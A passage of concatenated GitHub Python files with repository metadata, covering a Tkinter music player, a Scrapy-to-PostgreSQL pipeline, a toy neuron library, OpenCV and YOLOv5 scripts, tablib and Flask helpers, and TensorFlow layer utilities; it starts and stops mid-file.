Button(framePrincipal,text=\"Resume\",bg=\"#FF69B4\",fg=\"#e2504c\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=resume)\r\nbotonResume.place(relx=0.6,rely=0.8) \r\n#Pause\r\nbotonPause = Button(framePrincipal,text=\"Pause\",bg=\"#1DD4AA\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=pause)\r\nbotonPause.place(relx=0.35,rely=0.65) \r\n#Volumen +\r\nbotonVolumenmas= Button(framePrincipal,text=\"Vol. +\",bg=\"#808080\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=volmas)\r\nbotonVolumenmas.place(relx=0.15,rely=0.05)\r\n#Volumen -\r\nbotonVolumenmenos = Button(framePrincipal,text=\"Vol. -\",bg=\"#808080\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=volMenos)\r\nbotonVolumenmenos.place(relx=0.6,rely=0.05) \r\n\r\n\r\nraiz.mainloop()","repo_name":"fabiel00010/Reproductor","sub_path":"Interfas.py","file_name":"Interfas.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16483573794","text":"from unittest import TestCase, main\n\nfrom spiders.engine import CrawlerEngine\n\nclass TestCrawlerEngine(TestCase):\n\n def test_sync_all_nasdaq(self):\n engine = CrawlerEngine()\n engine.sync_all_nasdaq(\"/tmp/stocks\", '2010-01-01', '2020-12-04')\n\nif __name__ == '__main__':\n main()\n","repo_name":"xbkaishui/stock-spider","sub_path":"test/engine_test.py","file_name":"engine_test.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"31319270869","text":"# Define your item pipelines here\r\n#\r\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\r\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\r\n\r\n\r\n# useful for handling different item types with a single interface\r\nfrom itemadapter import ItemAdapter\r\nimport psycopg2\r\n\r\nclass SrealityPipeline:\r\n def __init__(self):\r\n # Connect to the PostgreSQL database\r\n hostname = 'db'\r\n username = 'luxonis'\r\n password = 'luxonis'\r\n database = 'luxonis'\r\n\r\n try:\r\n self.connection = psycopg2.connect(\r\n host=hostname,\r\n user=username,\r\n password=password,\r\n dbname=database\r\n )\r\n except psycopg2.Error as e:\r\n print(f\"Error connecting to database: {e}\")\r\n raise e\r\n \r\n # Create a table in the database\r\n self.cur = self.connection.cursor()\r\n self.cur.execute(\"\"\"\r\n DROP TABLE IF EXISTS sreality;\r\n CREATE TABLE IF NOT EXISTS sreality(\r\n id serial PRIMARY KEY, \r\n title text,\r\n img_url text\r\n );\r\n \"\"\")\r\n \r\n def process_item(self, item, spider):\r\n # Insert scraped data into the database\r\n try:\r\n self.cur.execute(\r\n \"INSERT INTO sreality (title, img_url) VALUES (%s, %s)\",\r\n (item[\"title\"], item[\"img_url\"])\r\n )\r\n self.connection.commit()\r\n \r\n except psycopg2.Error as e:\r\n print(f\"Error inserting data into database: {e}\")\r\n self.connection.rollback()\r\n raise e\r\n \r\n return item\r\n\r\n def close_spider(self, spider):\r\n # Close the cursor and database connection when the spider is done\r\n self.cur.close()\r\n self.connection.close()","repo_name":"borc23/SrealityLuxonis","sub_path":"Sreality/Sreality/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37875901080","text":"import sys\ninf = 2 ** 64\n#------------------------------------------------------------------------------\n# Artificial neurons can be used to emulate simple logic functions like\n# AND, OR, XOR etc. This library defines three simple class \"neuron\", \"link\"\n# and \"timer\" to build a simple neural network and emulate logic functions.\n#------------------------------------------------------------------------------\nclass annErrors () :\n def __init__(self) :\n self.errMsg = {}\n self.errMsg['001'] = \"\"\"\n Cannot take input using 'input' method if the associated link type\n is not 'input'.\n \"\"\"\n \n self.errMsg['002'] = \"\"\"\n Cannot extract values from a link using 'output' method if the \n respective link type is not 'output'.\n \"\"\"\n \n self.errMsg['004'] = \"\"\"\n An undefined link type specified. Valid link types are 'input',\n 'output', and 'bias'.\n \"\"\"\n \n self.errMsg['005'] = \"\"\"\n Can not set a bias input using setBiasInput to a link which \n is not a bias.\n \"\"\"\n # end def\n \n def error (self, code) :\n print(self.errMsg[code])\n raise() \n # end def\n# end class \n\n#-------------------------------------------------------------------------------\n# This class is used to emulate a neuron. The neuron class has the following \n# attributes or properties.\n# 1) The lower threshold and upper threshold. If the total input is less than\n# the lower threshold or greater than the upper threshold then output of\n# the neurone is zero, one otherwise.\n# 2) Array of incoming links.\n# 3) Array of outgoing links.\n# 4) The architectural layer in which the neuron belongs to.\n# 5) The timer data structure that decides when this neuron should be \n# activated.\n# Methods (public)\n# 1) input() : Send input signal to the neuron.\n# 2) output() : Read output signal from the neuron.\n# 3) activate() : activate the neuron. You will get the output after\n# activating the neuron only.\n# Methods (private)\n# 1. __activation_func__ : This function actually does the \"computation\"\n# inside the neuron.\n# Assumption:\n# Our activation function is a binary step function with threshold range\n# min_threshold and max_threshold. Input within the threshold range yields \n# output 1, whereas Input outside the threshold yields output 0.\n#------------------------------------------------------------------------------\nclass neuron (annErrors) :\n def __init__ (self, threshold_range, in_link, out_link, layer, timer, name = {}):\n self.name = name\n self.min_threshold = threshold_range[0]\n self.max_threshold = threshold_range[1]\n self.in_link = []\n self.out_link = []\n self.timer = timer\n self.layer = layer\n self.init_state = 0\n \n for l in in_link : \n self.in_link.append(l)\n # end for\n \n for o in out_link :\n self.out_link.append(o)\n # end for \n # end def __init __ ()\n\n def input (self, value) :\n i = 0\n for val in value :\n if (self.in_link[i].type() == 'input') :\n self.in_link[i].send(val)\n i = i + 1\n else :\n annErr.error('001')\n # end for\n # end for \n # end def\n\n def output (self) :\n outlist = []\n for o in self.out_link :\n if o.type() == 'output' :\n outlist.append(o.get())\n else :\n annErr.error('002') \n # end if\n # end for\n return outlist\n # end def\n\n def __activation_func__ (self, val) :\n if ((val >= self.min_threshold) and (val <= self.max_threshold)):\n return 1.0\n else :\n return 0.0\n # end if\n # end def \n \n def activate (self) :\n total_in = 0\n for i in self.in_link :\n total_in = total_in + i.get()\n # end for\n output = self.__activation_func__(total_in)\n # end if\n if (self.timer.getTime()) >= self.layer :\n for o in self.out_link :\n if (o.type() == 'output') or (o.type() == 'input') :\n o.send(output)\n else :\n annErr.error('003')\n # end if\n # end for\n # end if\n # end def\n# end class\n\n#-------------------------------------------------------------------------------\n# This class is used to emulate a link between two neuron. A link class must \n# have the property called weight. A signal passing through the link must be \n# multiplied by its weight.\n#-------------------------------------------------------------------------------\nclass link (annErrors) :\n def __init__ (self, weight = 1, type = 'link') :\n self.weight = weight\n self.in_signal = 0\n self.out_signal = 0\n if ((type == 'input') or\n (type == 'output') or\n (type == 'bias')) :\n self.link_type = type\n else :\n annErr.error('004') \n # end if\n # end def\n\n def send (self, val) :\n self.in_signal = val \n # end def\n\n def get (self) :\n self.out_signal = self.in_signal * self.weight\n return self.out_signal\n # end def\n\n def type (self) :\n return self.link_type\n # end def\n\n def setWeight(self, value) :\n self.weight = value\n # end def\n \n def setBiasInput(self, val) :\n if (self.link_type == 'bias') :\n self.send(val)\n else :\n annErr.error('005')\n # end if\n # end def\n# end class\n\n#-------------------------------------------------------------------------------\n# This class is used as timer which determine the sequence in which neurons\n# should be fired. The set of neurons that are architecturally at the same \n# layer should be fired at the same time.\n#-------------------------------------------------------------------------------\nclass timer () :\n def __init__ (self, max_layers) :\n self.current_time = 0\n self.max_layers = max_layers \n # end def\n\n def tick(self):\n if (self.current_time <= self.max_layers):\n self.current_time = self.current_time + 1\n return self.current_time\n else:\n self.reset()\n return self.current_time\n # end if\n # end def\n \n def getTime (self):\n return self.current_time\n # end def\n\n def reset (self):\n self.current_time = 0\n # end def \n# end class\n","repo_name":"abhijitdhar16/ann","sub_path":"neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19777234071","text":"class ScrapingProjectConstants(object):\n csv_extension = '.csv'\n baftas = 'baftas'\n academy_awards = 'academy_awards'\n cinema_showings = 'cinema_showings'\n cinemas_near_me = 'cinemas_near_me'\n films = 'films'\n films_near_me = 'films_near_me'\n gdp_file = 'monthly_gdp_uk_v2_cleaned.csv'\n weather_file = 'uk_monthly_weather_cleaned.csv'\n twitter_odeon_file = 'compiled_tweets_odeon.csv'\n box_office_file = 'compiled_top_15_box_office.csv'\n google_maps_scraper_output = 'C:/Users/johnd/OneDrive/Documents/cbq/third_proper_year/diss/code/scraping_project/google_maps_scraper/output'\n LIST_OF_NON_LONDON_POSTCODE_AREAS = ['St Albans', 'Brighton', 'Bromley', 'Cambridge', 'Chelmsford', 'Colchester',\n 'Croydon',\n 'Canterbury', 'Dartford', 'Enfield', 'Guildford', 'Harrow', 'Hemel Hempstead',\n 'Ilford',\n 'Kingston upon Thames', 'Rochester', 'Milton Keynes', 'Northampton', 'Oxford',\n 'Portsmouth',\n 'Reading', 'Redhill', 'Romford', 'Stevenage', 'Slough', 'Sutton', 'Swindon',\n 'Southampton',\n 'Southend-on-Sea', 'Tonbridge', 'Twickenham', 'Southall', 'Watford', 'Bath',\n 'Bournemouth',\n 'Bristol', 'Dorchester', 'Exeter', 'Gloucester', 'Hereford', 'Plymouth',\n 'Swindon', 'Salisbury',\n 'Taunton', 'Torquay', 'Truro', 'Cambridge', 'Chelmsford', 'Colchester',\n 'Ipswich', 'Norwich',\n 'Peterborough', 'Southend-on-Sea', 'Birmingham', 'Coventry', 'Dudley',\n 'Hereford',\n 'Llandrindod Wells', 'Stoke-on-Trent', 'Shrewsbury', 'Telford', 'Worcester',\n 'Walsall',\n 'Wolverhampton', 'Derby', 'Leicester', 'Lincoln', 'Nottingham', 'Northampton',\n 'Bradford',\n 'Doncaster', 'Huddersfield', 'Harrogate', 'Hull', 'Leeds', 'Sheffield',\n 'Wakefield', 'York',\n 'Durham', 'Darlington', 'Newcastle upon Tyne', 'Sunderland', 'Cleveland']\n\n LIST_OF_LONDON_POSTCODE_AREAS = ['Central London', 'East London', 'North London', 'Northeast London',\n 'Northwest London',\n 'Southeast London', 'Southwest London', 'West London']","repo_name":"John-D-T/webscrape_and_nowcast_project","sub_path":"common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20079700364","text":"from geometry.helpers import print_time_elapsed\nfrom geometry.point import Point\nfrom geometry.cube import Cube\nfrom geometry.enums import SPATIAL_DIRECTION\n\nfrom constants import (\n CUBES_ARRAY_WIDTH,\n CUBES_ARRAY_HEIGHT,\n CUBES_ARRAY_DEPTH,\n)\n\n\n# Class used to create, incapsulate and operate with a 3-D array of cubes\nclass CubeFromCubes:\n __slots__ = 'array',\n\n def __init__(self):\n self.array = self._create_cubes_array()\n\n @print_time_elapsed\n def _create_cubes_array(self):\n cubes_array = []\n cubes_plot = []\n cubes_row = []\n\n for plot in range(CUBES_ARRAY_HEIGHT):\n for row in range(CUBES_ARRAY_DEPTH):\n for cube in range(CUBES_ARRAY_WIDTH):\n cube = Cube(position_within_parent_cube=Point(row, cube, plot))\n cubes_row.append(cube)\n\n cubes_row = cubes_plot.append(cubes_row) or [] # append current cubes row and clear\n cubes_plot = cubes_array.append(cubes_plot) or [] # append current cubes plot and clear\n\n return cubes_array\n\n @print_time_elapsed\n def draw(self):\n from kivy.graphics import Color\n for plot in self.array: # height (z)\n for row in plot[::-1]: # rows from back to front\n for cube in row[::-1]: # cubes from left to right #\n cube.draw_sides()\n\n Color(rgba=(0, 0, 0, 100))\n\n for side in cube.drawn_sides:\n dashed, dash_offset = None, None\n # Color(rgba=(0, 0, 0, 2))\n no_draw = False\n if side.side_name in [SPATIAL_DIRECTION.LEFT, SPATIAL_DIRECTION.BACK]:\n Color(rgba=(0, 0, 0, 100))\n dashed = []\n dash_offset = 10\n no_draw = True\n\n if not no_draw:\n side.draw_edges(dashed=dashed, dash_offset=dash_offset)\n","repo_name":"Desantnikov/kivy_3d_graphics","sub_path":"geometry/cube_from_cubes.py","file_name":"cube_from_cubes.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14191621235","text":"from helper import *\nfrom solution import *\nfrom math import *\nimport time\n\n#Use for testing the training and testing processes of a model\ndef train_test_a_model(modelname, train_data, train_label, test_data, test_label, max_iter, learning_rate):\n '''\n you should try various number of max_iter and learning_rate\n '''\n if (modelname == \"logistic_regression\"):\n print(\"-------- Model: Logistic Regression ---------\")\n \n else:\n print(\"-------- Model: Third Order Regression ---------\")\n\n w = logistic_regression(train_data, train_label, max_iter, learning_rate)\n acc = accuracy(test_data, test_label, w)\n \n print(\"Accuracy:\", acc, \"\\n\")\n\ndef test_logistic_regression():\n '''\n you should try various number of max_iter and learning_rate\n '''\n # get training data\n df_train = load_features(\"../data/train.txt\")\n train_data = df_train[0]\n train_label = df_train[1]\n # get test data\n df_test = load_features(\"../data/test.txt\")\n test_data = df_test[0]\n test_label = df_test[1]\n # train and test the model\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 0.01)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 0.01)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 0.5)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 0.5)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 1)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 1)\n\ndef test_thirdorder_logistic_regression():\n '''\n you should try various number of max_iter and learning_rate\n '''\n # get the data to be transformed\n df_train = load_features(\"../data/train.txt\")\n df_test = load_features(\"../data/test.txt\")\n\n # get the third order transformed data\n data = np.append(df_train[0], df_test[0], axis=0)\n data = thirdorder(data)\n\n # split the training and testing data and labels\n train_data = data[:1561,:]\n train_label = df_train[1]\n test_data = data[1561:, :]\n test_label = df_test[1]\n\n # train and test the model\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 0.01)\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 0.01)\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 0.5)\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 0.5)\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 1)\n train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 1)\n\nif __name__ == '__main__':\n\ttest_logistic_regression()\n\ttest_thirdorder_logistic_regression()\n","repo_name":"RachayitaGiri/ai-homeworks","sub_path":"HW1/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8856024988","text":"#função pra colocar em um while loop perguntando alguma coisa e se deseja continuar\ndef ask_ok(prompt, follow=\"Continando \"):\n while True:\n ok = input(prompt)\n if ok in [\"SIM\", \"SI\", \"S\", \"sim\", \"si\", \"s\", \"ok\"]:\n print(follow)\n return True\n elif ok in [\"n\", \"na\", \"nao\", \"não\", \"nã\" \"N\", \"NA\", \"NÃ\", \"NÃO\", \"NAO\"]:\n print(\"\\nEntão digite novamente \")\n return False\n else:\n print(\"\\nPOR FAVOR DIGITE SIM OU NAO\")\n \nif __name__ == \"__main__\":\n while True:\n dataNasc = input(\"Digite sua data de nascimento com barras (ex. 01/01/1900): \")\n if ask_ok(\"A data \" + '\\033[1m' + dataNasc + \"\\033[0;0m\" +\" está correta? \", \"Continuando com a data: \" + '\\033[1m' + dataNasc + \"\\033[0;0m\")==True:\n break\n","repo_name":"MatheusFacina/MatheusFacina","sub_path":"basicfunctions.py","file_name":"basicfunctions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6432811189","text":"import tkinter as tk\nimport hw1_function as func\n\nwindow = tk.Tk()\nwindow.title('openCV')\nwindow.geometry('600x800')\n\nappmenu = tk.Menu(window)\n\nfilemenu = tk.Menu(appmenu, tearoff=0)\nfilemenu.add_command(\n label='開啟影像', command=lambda: func.open_image(window=window))\nfilemenu.add_command(label='儲存影像', command=lambda: func.save_image())\nappmenu.add_cascade(label='檔案(File)', menu=filemenu)\n\nsettingmenu = tk.Menu(appmenu, tearoff=0)\nsetting_color_space_menu = tk.Menu(settingmenu, tearoff=0)\nsettingmenu.add_command(\n label='設定ROI', command=lambda: func.set_roi(window=window))\nsettingmenu.add_command(\n label='顯示影像資訊', command=lambda: func.show_image_information())\nsetting_color_space_menu.add_command(\n label='RGB', command=lambda: func.change_color_space_rgb(window=window))\nsetting_color_space_menu.add_command(\n label='HSV', command=lambda: func.change_color_space_hsv(window=window))\nsetting_color_space_menu.add_command(\n label='灰階', command=lambda: func.change_color_space_gray(window=window))\nsettingmenu.add_cascade(label='改變色彩空間', menu=setting_color_space_menu)\nappmenu.add_cascade(label='設定(Setting)', menu=settingmenu)\n\nprocessingmenu = tk.Menu(appmenu, tearoff=0)\nsetting_filter_menu = tk.Menu(processingmenu, tearoff=0)\nsetting_filter_menu.add_command(\n label='均值濾波(Averaging Filter)', command=lambda: func.averaging_filter(window=window))\nsetting_filter_menu.add_command(\n label='高斯濾波(Gaussian Filter)', command=lambda: func.gaussian_filter(window=window))\nsetting_filter_menu.add_command(\n label='中值濾波(Median Filter)', command=lambda: func.median_filter(window=window))\nsetting_filter_menu.add_command(\n label='雙邊濾波(Bilateral Filter)', command=lambda: func.bilateral_filter(window=window))\nsetting_filter_menu.add_command(\n label='索貝爾濾波(Sobel Filter)', command=lambda: func.sobel_filter(window=window))\nsetting_filter_menu.add_command(\n label='拉普拉斯濾波(Laplacian Filter)', command=lambda: func.laplacian_filter(window=window))\nprocessingmenu.add_cascade(label='鄰域處理', menu=setting_filter_menu)\nprocessingmenu.add_command(label='影像二值化(Thresholding)',\n command=lambda: func.thresholding(window=window))\nprocessingmenu.add_command(label='直方圖等化(Histogram Equalization)',\n command=lambda: func.histogram_equalization(window=window))\nprocessingmenu.add_command(label='仿射轉換(Affine Transform)',\n command=lambda: func.affine_transform(window=window))\nprocessingmenu.add_command(label='透視投影轉換(Perspective Transform)',\n command=lambda: func.perspective_transform(window=window))\nappmenu.add_cascade(label='影像處理(Image Processing)', menu=processingmenu)\n\nothermenu = tk.Menu(appmenu, tearoff=0)\nothermenu.add_command(\n label='合併影像(Image Merge)', command=lambda: func.image_merge(window=window))\nappmenu.add_cascade(label='其他功能(others)', menu=othermenu)\n\nappmenu.add_command(label='離開(Quit)', command=lambda: exit())\n\nwindow.config(menu=appmenu)\n\nwindow.mainloop()\n","repo_name":"h1431532403240/openCV-hw1","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4813514586","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[11]:\n\n\nfrom matplotlib import scale\nimport torch\nimport numpy as np\nimport cv2\nimport pandas as pd\nimport math\n\nyolo_result=''\n\ndef getYOLO(img) :\n\n try :\n # 모델 로드\n torch.hub._validate_not_a_forked_repo=lambda a,b,c: True\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='0727last.pt', force_reload=True)\n\n # 이미지 받아오기 \n\n #for img in enumerate(IMAGE_FILES):\n\n\n\n # 모델 돌린 결과 중 라벨값 변수에 담아주기 \n \n results = model(img)\n\n findThing = results.pandas().xyxy[0]['name']\n findList=[]\n for find in findThing :\n findList.append(find)\n print(findList) \n\n # 좌푯값 받아오기\n xmin = results.pandas().xyxy[0]['xmin']\n xmax = results.pandas().xyxy[0]['xmax']\n ymin = results.pandas().xyxy[0]['ymin']\n ymax = results.pandas().xyxy[0]['ymax']\n\n # 좌푯값 데이터 프레임에 저장\n\n dots = results.pandas().xyxy[0]\n dotsdf = pd.DataFrame(dots)\n dotsdf['xpoint'] = (xmin+xmax)/2\n dotsdf['ypoint'] = (ymin+ymax)/2\n\n # 라벨들 바운딩 박스 중앙 좌표값\n\n persondot = dotsdf[dotsdf['name']=='person'][['xpoint','ypoint']]\n notpersondot = dotsdf[dotsdf['name']!='person'][['name','xpoint','ypoint']]\n\n if notpersondot.empty :\n yolo_result = 'noobject'\n #continue\n\n if persondot.empty :\n yolo_result = 'noperson'\n #continue\n\n persondotlist = persondot.values.tolist()\n notpersondotlist = notpersondot.values.tolist()\n\n\n\n # 사람 좌표와 객체 좌표간 거리 구하기\n\n distance = []\n\n for i in range (len(notpersondotlist)) :\n distance.append(math.sqrt(math.pow(int(persondotlist[0][0]) - int(notpersondotlist[i][1]) , 2) + math.pow(int(persondotlist[0][1]) - int(notpersondotlist[i][2]) , 2) ) )\n\n # 가장 가까운 값 구하기 위해 객체와의 거리값 데이터프레임에 컬럼으로 추가 \n\n notpersondot['distance'] = distance\n\n # name값 변수로 담아주기\n\n yolo_result = notpersondot[notpersondot[\"distance\"] == notpersondot[\"distance\"].min()].iloc[0,0]\n print(yolo_result + '가 검출되었습니다')\n\n # if 문으로 스켈레톤 값과 YOLO name 값 취합해서 Str 형태 타입으로 반환해주기 \n\n\n # Results\n results.print()\n\n except IndexError:\n pass\n \n return yolo_result\n\n\n# if yolo_result == 'book' and skeleton_result == 'less_active' :\n# final_result == 'reading'\n# elif yolo_result == 'dumbbell' and skeleton_result == 'active' :\n# final_result == 'workout'\n\n","repo_name":"seoyyy/MyStudy","sub_path":"project_SoundBunker/yolo_final.py","file_name":"yolo_final.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5127736175","text":"\"\"\" Tablib - DataFrame Support.\n\"\"\"\n\n\nimport sys\n\n\nif sys.version_info[0] > 2:\n from io import BytesIO\nelse:\n from cStringIO import StringIO as BytesIO\n\ntry:\n from pandas import DataFrame\nexcept ImportError:\n DataFrame = None\n\nimport tablib\n\nfrom tablib.compat import unicode\n\ntitle = 'df'\nextensions = ('df', )\n\ndef detect(stream):\n \"\"\"Returns True if given stream is a DataFrame.\"\"\"\n if DataFrame is None:\n return False\n try:\n DataFrame(stream)\n return True\n except ValueError:\n return False\n\n\ndef export_set(dset, index=None):\n \"\"\"Returns DataFrame representation of DataBook.\"\"\"\n if DataFrame is None:\n raise NotImplementedError(\n 'DataFrame Format requires `pandas` to be installed.'\n ' Try `pip install tablib[pandas]`.')\n dataframe = DataFrame(dset.dict, columns=dset.headers)\n return dataframe\n\n\ndef import_set(dset, in_stream):\n \"\"\"Returns dataset from DataFrame.\"\"\"\n dset.wipe()\n dset.dict = in_stream.to_dict(orient='records')\n","repo_name":"ZhiqiKou/TravelWeb","sub_path":"zhiqiTravelenv/lib/python3.6/site-packages/tablib/formats/_df.py","file_name":"_df.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"66"} +{"seq_id":"26486467981","text":"from threading import Thread\nfrom typing import List\n\nfrom flask_mail import Message\n\nfrom app import current_app\nfrom app import mail\n\n\ndef send_async_email(app: current_app, msg: Message) -> None:\n \"\"\"\n Асинхронная обёртка для отправки email сообщения\n :param app: Экземпляр приложения\n :param msg:\n :return:\n \"\"\"\n with app.app_context():\n mail.send(msg)\n\n\ndef send_email(subject: str, sender: str, recipients: List[str], text_body: str, html_body: str,\n attachments=None, sync=False) -> None:\n \"\"\"\n Отправка email сообщения\n :param subject: тема письма\n :param sender: адрес почты отправителя\n :param recipients: адрес почты получателя\n :param text_body:\n :param html_body:\n :return:\n \"\"\"\n with current_app.app_context():\n msg = Message(subject, sender=sender, recipients=recipients)\n msg.body = text_body\n msg.html = html_body\n\n if attachments:\n for attachment in attachments:\n msg.attach(*attachment)\n if sync:\n mail.send(msg)\n else:\n # Запуск потока\n Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()\n","repo_name":"IANovoselov/microblog","sub_path":"app/email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11152004553","text":"import tensorflow as tf\nimport numpy as np\nimport math\n'''\nUtility layers\n'''\ndef upsampling(x, size, name='upsample'):\n return tf.image.resize_nearest_neighbor(x, size=size, name=name)\n\ndef pixel_shuffle(x, block_size=2, name='pixel_shuffle'):\n return tf.depth_to_space(x, block_size, name=name)\n\ndef sigmoid(x):\n return tf.nn.sigmoid(x, name=\"sigmoid\")\n\ndef relu(x, leaky=False):\n if leaky:\n return tf.nn.leaky_relu(x, name='leaky_relu')\n else:\n return tf.nn.relu(x, name='relu')\n\ndef relu6(x, leaky=False):\n return tf.nn.relu6(x, name='relu6')\n\ndef batch_norm(x, momentum=0.9, epsilon=1e-5, training=False, name='bn'):\n return tf.layers.batch_normalization(x, momentum=momentum, epsilon=epsilon, scale=True, training=training, name=name)\n\ndef hard_sigmoid(x, name='hard_sigmoid'):\n with tf.variable_scope(name):\n return tf.keras.activations.hard_sigmoid(x)\n\ndef tanh(x, name='tanh'):\n return tf.nn.tanh(x, name=name)\n\ndef global_avg(x):\n with tf.name_scope('global_avg'):\n net=tf.layers.average_pooling2d(x, x.get_shape()[1:-1], 1)\n return net\n\ndef flatten(x):\n #flattened=tf.reshape(input,[x.get_shape().as_list()[0], -1]) # or, tf.layers.flatten(x)\n return tf.contrib.layers.flatten(x)\n\ndef pad2d(inputs, pad=(0, 0), mode='CONSTANT'):\n paddings = [[0, 0], [pad[0], pad[0]], [pad[1], pad[1]], [0, 0]]\n net = tf.pad(inputs, paddings, mode=mode)\n return net\n\ndef spectral_norm(w, iteration=1):\n w_shape = w.shape.as_list()\n w = tf.reshape(w, [-1, w_shape[-1]])\n\n u = tf.get_variable('u', [1, w_shape[-1]], initializer=tf.random_normal_initializer(), trainable=False)\n\n u_hat = u\n v_hat = None\n for _ in range(iteration):\n\n \"\"\"\n power iteration\n Usually iteration = 1 will be enough\n \"\"\"\n\n v_ = tf.matmul(u_hat, tf.transpose(w))\n v_hat = tf.nn.l2_normalize(v_)\n\n u_ = tf.matmul(v_hat, w)\n u_hat = tf.nn.l2_normalize(u_)\n\n u_hat = tf.stop_gradient(u_hat)\n v_hat = tf.stop_gradient(v_hat)\n\n sigma = tf.matmul(tf.matmul(v_hat, w), tf.transpose(u_hat))\n\n with tf.control_dependencies([u.assign(u_hat)]):\n w_norm = w / sigma\n w_norm = tf.reshape(w_norm, w_shape)\n\n\n return w_norm\n'''\nEnd of Utility layers\n'''\n\n'''\nConvulution Layers\n'''\ndef conv2d(x, filter_shape, stride=1, bias=True, padding='SAME', snorm=False, name='conv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=filter_shape, initializer=tf.contrib.layers.xavier_initializer())\n if snorm:\n w = spectral_norm(w)\n\n x = tf.nn.conv2d(x, w, [1, stride, stride, 1], padding=padding)\n if bias:\n b = tf.get_variable('bias', shape=filter_shape[-1], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n \n return x\n\ndef deconv2d(x, filter_shape, output_shape, stride=1, bias=True, padding='SAME', name='deconv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=filter_shape, initializer=tf.contrib.layers.xavier_initializer())\n x = tf.nn.conv2d_transpose(x, w, output_shape, [1, stride, stride, 1], padding=padding)\n\n if bias:\n b = tf.get_variable('bias', shape=filter_shape[-2], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n\n return x\n\ndef dwise_conv(x, input_dim, channel_multiplier=1, filter_size=3, stride=1, bias=True, padding='SAME', name='dw_conv'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=[filter_size, filter_size, input_dim, channel_multiplier],\n initializer=tf.contrib.layers.xavier_initializer())\n x = tf.nn.depthwise_conv2d(x, w, [1, stride, stride, 1], padding = padding)\n\n if bias:\n b = tf.get_variable('bias', shape=[input_dim*channel_multiplier], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n\n return x\n\ndef pwise_conv(x, input_dim, output_dim, bias=True, name='pw_conv'):\n return conv2d(x, [1,1,input_dim,output_dim], stride=1, bias=bias, padding='SAME', name=name)\n\ndef separable_conv(x, input_dim, output_dim, filter_size=3, channel_multiplier=1, stride=1, bias=True, padding='SAME', name='sp_conv'):\n with tf.variable_scope(name):\n dwise_filter = tf.get_variable('dw', shape=[filter_size, filter_size, input_dim, channel_multiplier],\n initializer=tf.contrib.layers.xavier_initializer())\n\n pwise_filter = tf.get_variable('pw', [1, 1, input_dim*channel_multiplier, output_dim],\n initializer=tf.contrib.layers.xavier_initializer()) \n x = tf.nn.separable_conv2d(x,dwise_filter,pwise_filter,[1,stride, stride,1],padding=padding, name=name)\n if bias:\n b = tf.get_variable('bias', [output_dim], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n return x\n'''\nEnd of Convulutions Layers\n'''\n'''\nBlocks\n'''\ndef conv2d_block(x, input_dim, output_dim, filter_size=3, stride=1, bias=True, padding='SAME',\n snorm=False, leaky=False, linear=False, af=\"relu\", name='conv_block'):\n with 